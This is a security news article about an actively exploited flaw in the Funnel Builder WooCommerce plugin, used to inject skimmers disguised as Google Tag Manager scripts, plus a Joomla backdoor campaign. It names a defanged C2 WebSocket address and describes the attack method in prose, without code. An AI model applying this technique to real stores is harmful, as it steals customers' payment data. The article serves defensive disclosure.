A serious security vulnerability in the Funnel Builder plugin for WordPress is currently being actively exploited by attackers to inject malicious JavaScript into WooCommerce checkout pages and steal customer payment information.
The issue was disclosed this week by cybersecurity firm Sansec. The vulnerability affects all versions of the Funnel Builder plugin prior to version 3.15.0.3 and currently has no official CVE identifier assigned.
The plugin is widely used across more than 40,000 WooCommerce stores, making the flaw a significant threat to online merchants.
How the Attack Works
According to researchers, the vulnerability allows unauthenticated attackers to inject arbitrary JavaScript code into checkout pages without needing administrator access.
The flaw exists because older versions of Funnel Builder exposed a checkout endpoint that allowed external requests to trigger internal plugin methods. Critically, the plugin failed to verify user permissions or restrict which methods could be executed.
Attackers can exploit this weakness by sending specially crafted requests that modify the plugin’s global settings and inject malicious scripts into every checkout page.
Sansec explained that attackers are disguising the malicious code as legitimate Google Tag Manager (GTM) scripts inside the plugin’s “External Scripts” settings.
“The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout,” the company said.
Fake GTM Scripts Used to Deliver Payment Skimmers
In one observed attack, the malicious payload pretended to be a Google Tag Manager loader while secretly downloading additional JavaScript from a remote domain.
The malware then opened a WebSocket connection to the attacker’s command-and-control (C2) server:
wss://protect-wss[.]com/ws
The server delivered a customized payment skimmer specifically tailored to the targeted WooCommerce store.
Once active, the skimmer could capture:
- Credit card numbers
- CVV security codes
- Billing addresses
- Customer personal information entered during checkout
This type of attack is commonly associated with Magecart-style payment skimming campaigns targeting e-commerce websites.
FunnelKit Releases Security Patch
FunnelKit, the company behind Funnel Builder, has addressed the vulnerability in version 3.15.0.3.
Store owners are strongly advised to:
- Immediately update the Funnel Builder plugin to the latest version
- Review Settings → Checkout → External Scripts for suspicious or unfamiliar code
- Remove any unauthorized scripts or tracking tags
- Conduct a full malware scan of their WooCommerce environment
Sansec noted that disguising skimmers as analytics or tracking scripts is a common tactic because administrators often ignore code snippets that appear to belong to trusted services like Google Analytics or GTM.
Rising Threats Against CMS Platforms
The disclosure comes shortly after another major web security incident involving compromised Joomla websites.
Earlier this month, researchers at Sucuri uncovered a campaign where attackers injected heavily obfuscated PHP backdoors into Joomla sites.
The malicious code allowed attackers to:
- Communicate with remote command-and-control servers
- Dynamically inject spam content
- Redirect visitors to malicious pages
- Manipulate search engine results without the site owner’s knowledge
Security researcher Puja Srivastava described the malware as a “remote loader” capable of changing site behavior at any time without modifying local files again.
Final Thoughts
This latest WooCommerce attack highlights the growing risks facing e-commerce platforms and WordPress plugin ecosystems. With attackers increasingly targeting checkout pages and payment flows, keeping plugins updated and monitoring injected scripts has become essential for online store security.
Website administrators should prioritize timely patching, implement web application firewalls, and regularly audit third-party plugins to reduce the risk of compromise.
